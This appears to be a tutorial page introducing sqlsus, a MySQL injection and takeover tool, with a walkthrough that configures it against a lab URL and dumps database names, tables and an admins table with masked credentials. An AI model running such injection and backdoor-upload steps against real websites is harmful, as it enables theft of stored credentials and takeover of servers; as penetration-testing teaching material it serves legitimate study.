SQLSus

Description

sqlsus is an open source MySQL injection and takeover tool, written in perl.

Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database(s), and much more…
Whenever relevant, sqlsus will mimic a MySQL console output.

sqlsus focuses on speed and efficiency, optimising the available injection space, making the best use (I can think of) of MySQL functions.
It uses stacked subqueries and an powerful blind injection algorithm to maximise the data gathered per web server hit.
Using multithreading on top of that, sqlsus is an extremely fast database dumper, be it for inband or blind injection.

If the privileges are high enough, sqlsus will be a great help for uploading a backdoor through the injection point, and takeover the web server.

It uses SQLite as a backend, for an easier use of what has been dumped, and integrates a lot of usual features (see below) such as cookie support, socks/http proxying, https.

Usage

Syntax

sqlsus [options] [config file]

Options

         -h, --help                    brief help message
         -v, --version                 version information
         -e, --execute <commands>      execute commands and exit
         -g, --genconf <filename>      generate configuration file

Example

Two Examples Provided By them are : 

inband : MySQL 5, no quotes allowed, inband injection.

takeover : MySQL 4, quotes allowed, FILE privilege, inband injection.

 

 

Two Simplify Things there is one more example : 

Change Directory :

cyborg@cyborg:~$ cd /pentest/database/sqlsus/

Generate Config File  :

cyborg@cyborg:/pentest/database/sqlsus$  sudo sqlsus -g sqlsus.conf
defined(@array) is deprecated at sqlsus line 80.
	(Maybe you should just omit the defined()?)

              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

[+] Configuration successfully saved to sqlsus.conf

Verify Using ls  :

cyborg@cyborg:/pentest/database/sqlsus$ ls
CHANGELOG  lib  LICENSE  README  sqlsus   sqlsus.conf

Open the Config File :

cyborg@cyborg:/pentest/database/sqlsus$ sudo gedit sqlsus.conf

Change the our $url_start = "" to your vulnerable URL .

sqlsus SQLSus

Get Started :

cyborg@cyborg:/pentest/database/sqlsus$ sudo sqlsus sqlsus.conf
defined(@array) is deprecated at sqlsus line 80.
 (Maybe you should just omit the defined()?)

 sqlsus version 0.7.2

 Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

[+] Session "192.168.1.15" loaded
sqlsus> start
[+] Correct number of columns for UNION : 6 (0,1,0,1,0,0)
[+] Length restriction on URL : 8200 bytes 
[+] Filling %target...
+----------+-----------------------+
| Variable | Value                 |
+----------+-----------------------+
| database | vulnerabledb          |
| user     | 'website'@'localhost' |
| version  | 5.0.95                |
+----------+-----------------------+
3 rows in set 


Get Names of Databases :

sqlsus> get databases
[+] Getting databases names
+------------+ 
| Databases  |
+------------+
|vulnerabledb|
| test       |
+------------+
2 rows in set 

Get Names of Tables:

sqlsus> get tables
[+] Getting tables names
 
<( vulnerabledb )>

 [user]
 

 [testd]
 

 [admins]

Get Names of Columns:

sqlsus> get columns
[+] Getting tables and columns names
 
<( vulnerabledb )>


 [admins]
 admin_id
 admin_username
 admin_password

Get Data:

sqlsus> select * from admins
+----------+----------------+----------------+
| admin_id | admin_password | admin_username |
+----------+----------------+----------------+
+    *     +   **********   +    ********    +
+----------+----------------+----------------+
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?